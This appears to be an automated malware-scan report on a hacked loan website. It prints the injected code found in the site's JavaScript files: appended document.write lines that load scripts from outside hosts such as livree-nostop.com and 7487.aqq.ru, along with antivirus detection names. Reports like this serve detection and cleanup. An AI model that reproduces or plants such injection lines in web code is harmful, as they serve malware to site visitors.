
Malware Scanner report for 203k-loans-ct.com

Malicious / Suspicious / Total URLs checked
4/11/15
15 pages contain malicious or suspicious code (4 malicious, 11 suspicious). See details below.
Blacklists
Found
The website is marked by Google as suspicious.

The website "203k-loans-ct.com" has probably been hacked and is losing visitors as a result. Take action as soon as possible to fix the security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK


Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=203k-loans-ct.com

Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request | Server response | Status
http://203k-loans-ct.com/
200 OK
Content-Length: 19157
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://7487.aqq.ru/fhxH9WLK.php?id=9713739"></script>

http://203k-loans-ct.com/_include/js/jquery.js
200 OK
Content-Length: 77950
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161764"></script>');

http://203k-loans-ct.com/_include/js/jquery.badBrowser.js
200 OK
Content-Length: 1805
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161757"></script>');

http://203k-loans-ct.com/_include/js/jquery.tools.js
200 OK
Content-Length: 207
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161768"></script>');

http://203k-loans-ct.com/_include/js/jquery.easing.js
200 OK
Content-Length: 8269
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

jQuery.easing['jswing'] = jQuery.easing['swing'];
jQuery.extend( jQuery.easing,
{
def: 'easeOutQuad',
swing: function (x, t, b, c, d) {
return jQuery.easing[jQuery.easing.def](x, t, b, c, d);
},
easeInQuad: function (x, t, b, c, d) {
return c*(t/=d)*t b;
},
easeOutQuad: function (x, t, b, c, d) {
return -c *(t/=d)*(t-2) b;
},
easeInOutQuad: function (x, t, b, c, d) {
if ((t/=d/2) < 1) return c/2*t*t b;
retur
... 4175 bytes are skipped ...
t-=(1.5/2.75))*t .75) b;
} else if (t < (2.5/2.75)) {
return c*(7.5625*(t-=(2.25/2.75))*t .9375) b;
} else {
return c*(7.5625*(t-=(2.625/2.75))*t .984375) b;
}
},
easeInOutBounce: function (x, t, b, c, d) {
if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 b;
return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 c*.5 b;
}
});
document.write('<img src="http://localhost/" >');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
VIPRE
Malware.JS.Generic (JS)
Sophos
Mal/Iframe-AN

http://203k-loans-ct.com/_include/js/cufon.js
200 OK
Content-Length: 39657
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161754"></script>');

http://203k-loans-ct.com/_include/js/Vera_400-Vera_700-Vera_oblique_400-Vera_oblique_700.font.js
200 OK
Content-Length: 181022
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161753"></script>');

http://203k-loans-ct.com/_include/js/jquery.prettyPhoto.js
200 OK
Content-Length: 29835
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161767"></script>');

http://203k-loans-ct.com/_include/js/jquery.hoverInt.js
200 OK
Content-Length: 3380
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function($){

$.fn.hoverIntent = function(f,g) {
var cfg = {
sensitivity: 7,
interval: 100,
timeout: 0
};
cfg = $.extend(cfg, g ? { over: f, out: g } : f );
var cX, cY, pX, pY;
var track = function(ev) {
cX = ev.pageX;
cY = ev.pageY;
};
var compare = function(ev,ob) {
ob.hoverIntent_t = clearTimeout(ob.hoverIntent_t);
if ( ( Math.abs(pX-cX) Math.abs(pY-cY) ) < cfg.sensitivi
... 954 bytes are skipped ...
$(ob).bind("mousemove",track);
if (ob.hoverIntent_s != 1) { ob.hoverIntent_t = setTimeout( function(){compare(ev,ob);} , cfg.interval );}
} else {
$(ob).unbind("mousemove",track);
if (ob.hoverIntent_s == 1) { ob.hoverIntent_t = setTimeout( function(){delay(ev,ob);} , cfg.timeout );}
}
};
return this.mouseover(handleHover).mouseout(handleHover);
};
})(jQuery);
document.write('<img src="http://localhost/" >');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Mal/Iframe-AN

http://203k-loans-ct.com/_include/js/jquery.bgiframe.js
200 OK
Content-Length: 1931
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161758"></script>');

http://203k-loans-ct.com/_include/js/superfish.js
200 OK
Content-Length: 3906
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

;(function($){
$.fn.superfish = function(op){
var sf = $.fn.superfish,
c = sf.c,
$arrow = $(['<span class="',c.arrowClass,'"> &#187;</span>'].join('')),
over = function(){
var $$ = $(this), menu = getMenu($$);
clearTimeout(menu.sfTimer);
$$.showSuperfishUl().siblings().hideSuperfishUl();
},
out = function(){
var $$ = $(this), menu = getMenu($$), o = sf.op;
clearTimeout(menu.sfTimer);
men
... 2869 bytes are skipped ...
);
return this;
},
showSuperfishUl : function(){
var o = sf.op,
sh = sf.c.shadowClass '-off',
$ul = this.addClass(o.hoverClass)
.find('>ul:hidden').css('visibility','visible');
sf.IE7fix.call($ul);
o.onBeforeShow.call($ul);
$ul.animate(o.animation,o.speed,function(){ sf.IE7fix.call($ul); o.onShow.call($ul); });
return this;
}
});
})(jQuery);
document.write('<img src="http://localhost/" >');

Antivirus reports:

AntiVir
HTML/TwitScroll.B
Avast
JS:Iframe-AMJ [Trj]
Ikarus
Trojan.IframeRef
nProtect
Trojan.Iframe.BQM
TrendMicro-HouseCall
HTML_IFRAME.ACD
Comodo
TrojWare.JS.Iframe.FK
McAfee-GW-Edition
JS/IFrame.gen.j
TrendMicro
HTML_IFRAME.ACD
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Exploit:HTML/IframeRef.DM
MicroWorld-eScan
Trojan.Iframe.BQM
McAfee
JS/IFrame.gen.j
NANO-Antivirus
Trojan.Html.TwitScroll.bklyhq
F-Secure
Trojan.Iframe.BQM
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
AVG
HTML/Framer
Norman
Iframe.UW
GData
Trojan.Iframe.BQM
Commtouch
IFrame.gen
BitDefender
Trojan.Iframe.BQM

http://203k-loans-ct.com/_include/js/swfobject.js
200 OK
Content-Length: 10425
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac=
... 9745 bytes are skipped ...
n.search||j.location.hash;if(Z){if(/\?/.test(Z)){Z=Z.split("?")[1]}if(aa==null){return L(Z)}var Y=Z.split("&");for(var X=0;X<Y.length;X ){if(Y[X].substring(0,Y[X].indexOf("="))==aa){return L(Y[X].substring((Y[X].indexOf("=") 1)))}}}return""},expressInstallCallback:function(){if(a){var X=c(R);if(X&&l){X.parentNode.replaceChild(l,X);if(Q){w(Q,true);if(M.ie&&M.win){l.style.display="block"}}if(E){E(B)}}a=false}}}}();
document.write('<img src="http://localhost/" >');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Mal/Iframe-AN

http://203k-loans-ct.com/_include/js/jquery.captify.js
200 OK
Content-Length: 5749
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161759"></script>');

http://203k-loans-ct.com/_include/js/custom.js
200 OK
Content-Length: 2250
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161755"></script>');

http://203k-loans-ct.com/_include/js/jqplot/jquery.jqplot.js
200 OK
Content-Length: 298822
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=9713792"></script>');


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: 203k-loans-ct.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 Jun 2014 17:30:06 GMT
Accept-Ranges: bytes
Server: nginx/1.6.0
Content-Length: 19157
Content-Type: text/html
Last-Modified: Mon, 17 Mar 2014 22:15:31 GMT

...19157 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 203k-loans-ct.com
Referer: http://www.google.com/search?q=203k-loans-ct.com

Result:
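The result is similar to the first query. No suspicious redirects were found. Only the Referer header differs between the two queries shown, so redirects conditioned on other request properties are not covered by this check.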